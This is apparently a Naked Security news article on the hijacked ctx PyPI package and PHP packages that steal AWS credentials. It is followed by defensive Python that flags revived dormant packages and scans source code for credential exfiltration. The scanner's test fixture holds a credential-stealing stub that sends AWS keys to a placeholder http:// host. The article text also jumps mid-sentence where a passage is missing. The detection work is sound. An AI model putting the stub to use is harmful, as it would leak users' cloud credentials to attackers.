Poisoned Python and PHP packages purloin passwords for AWS access
2022-05-25 18:04

A keen-eyed researcher at SANS recently wrote about a new and rather specific sort of supply chain attack against open-source modules in Python and PHP. Following online discussions about a suspicious public Python module, Yee Ching Tok noted that a package called ctx in the popular PyPI repository had suddenly received an update, despite not otherwise having been touched since late 2014.

In theory, of course, there's nothing wrong with old packages suddenly coming back to life.

Packages can fall victim to quiet takeovers, where the password to the maintainer's account is cracked, stolen, reset or otherwise compromised, so that the package becomes a beachhead for a new wave of supply chain attacks.

The attackers aren't necessarily targeting any specific users of the package they compromise - often, they're simply watching and waiting to see if anyone falls for their package bait-and-switch.

Interestingly, the poisoned ctx package was soon updated twice more, with extra "secret sauce" squirrelled away in the infected code, this time including more aggressive data-stealing code.

Get() in the rogue Python code you saw before) and fashioned into a URL. This time the crooks used http instead of https, so besides stealing your secret data for themselves they also send it over an unencrypted connection, exposing your AWS secrets to anyone logging your traffic as it crosses the internet.
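Both warning signs in this story can be checked mechanically: a long-dormant package that suddenly gets a new release, and module code that reads AWS credentials from environment variables and ships them to a plaintext http:// URL. The Python below is an added example written for this page, not code from the Sophos article, the SANS write-up or the ctx package. The release metadata is a constructed stand-in in the shape of PyPI's JSON API (https://pypi.org/pypi/<name>/json), the scanned module is a constructed generic stealer stub (hostname collector.example is hypothetical) that is only parsed, never executed, and the three-year dormancy threshold is an arbitrary choice.

```python
"""Two checks for the warning signs in the ctx story (constructed example)."""
from __future__ import annotations

import ast
import json
from datetime import datetime, timedelta

# Quieter than this between the two newest releases counts as "dormant then
# revived".  Three years is an arbitrary threshold chosen for this example.
DORMANCY_GAP = timedelta(days=3 * 365)

# Environment variables the AWS SDKs and CLI read credentials from.
AWS_ENV_NAMES = {"AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY", "AWS_SESSION_TOKEN"}

# Constructed release history in the shape of PyPI's JSON API.
# Illustrative dates, not the real ctx upload history.
SAMPLE_RELEASES_JSON = json.dumps({
    "info": {"name": "example-pkg"},
    "releases": {
        "0.1.0": [{"upload_time_iso_8601": "2014-11-02T10:00:00.000000Z"}],
        "0.1.2": [{"upload_time_iso_8601": "2014-12-19T08:30:00.000000Z"}],
        "0.2.0": [{"upload_time_iso_8601": "2022-05-15T17:50:00.000000Z"}],
    },
})

# Constructed module in the style of the stealer: AWS credentials pulled from
# the environment and pushed to a plaintext http:// URL.  Only ever parsed
# here, never run.  The hostname is hypothetical.
SAMPLE_MODULE = '''
import os
import urllib.request

def report():
    key = os.environ.get("AWS_ACCESS_KEY_ID", "")
    secret = os.environ.get("AWS_SECRET_ACCESS_KEY", "")
    urllib.request.urlopen("http://collector.example/?k=" + key + "&s=" + secret)
'''


def release_dates(pypi_json: str) -> list[tuple[str, datetime]]:
    """(version, first upload time) pairs, oldest first."""
    dated = []
    for version, files in json.loads(pypi_json)["releases"].items():
        if not files:  # a version can exist with no uploaded files
            continue
        first = min(datetime.fromisoformat(f["upload_time_iso_8601"].replace("Z", "+00:00"))
                    for f in files)
        dated.append((version, first))
    return sorted(dated, key=lambda item: item[1])


def dormant_then_revived(pypi_json: str, gap: timedelta = DORMANCY_GAP):
    """(previous version, new version, days of silence) when the newest
    release followed at least `gap` of silence, otherwise None."""
    dated = release_dates(pypi_json)
    if len(dated) < 2:
        return None
    (prev_version, prev_time), (new_version, new_time) = dated[-2], dated[-1]
    silence = new_time - prev_time
    return (prev_version, new_version, silence.days) if silence >= gap else None


def _string_constants(tree: ast.AST) -> set[str]:
    return {n.value for n in ast.walk(tree)
            if isinstance(n, ast.Constant) and isinstance(n.value, str)}


def _reads_environment(tree: ast.AST) -> bool:
    """True for os.environ[...], os.environ.get(...), os.getenv(...) or the
    same names imported bare."""
    for node in ast.walk(tree):
        if isinstance(node, ast.Attribute) and node.attr in ("environ", "getenv"):
            return True
        if isinstance(node, ast.Name) and node.id in ("environ", "getenv"):
            return True
    return False


def scan_source(source: str) -> list[str]:
    """Flag AWS credential reads, plaintext http:// URLs, and the combination."""
    tree = ast.parse(source)
    strings = _string_constants(tree)
    findings = []
    env_keys = sorted(AWS_ENV_NAMES & strings)
    if env_keys and _reads_environment(tree):
        findings.append("reads AWS credentials from the environment: " + ", ".join(env_keys))
    plain_http = sorted(s for s in strings if s.startswith("http://"))
    if plain_http:
        findings.append("plaintext http:// URL: " + ", ".join(plain_http))
    if env_keys and plain_http:
        findings.append("credentials and an unencrypted URL in the same module: probable exfiltration")
    return findings


if __name__ == "__main__":
    print(dormant_then_revived(SAMPLE_RELEASES_JSON))
    for finding in scan_source(SAMPLE_MODULE):
        print("-", finding)
```

The dormancy check is only a prompt to look closer, since legitimate projects do revive; the source scan is deliberately crude (string constants plus environment access) and will miss payloads that assemble names at runtime or decode them from base64, which is why it belongs in a pre-install review step rather than as a sole gate.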


News URL

https://nakedsecurity.sophos.com/2022/05/25/poisoned-python-and-php-packages-purloin-passwords-for-aws-access/
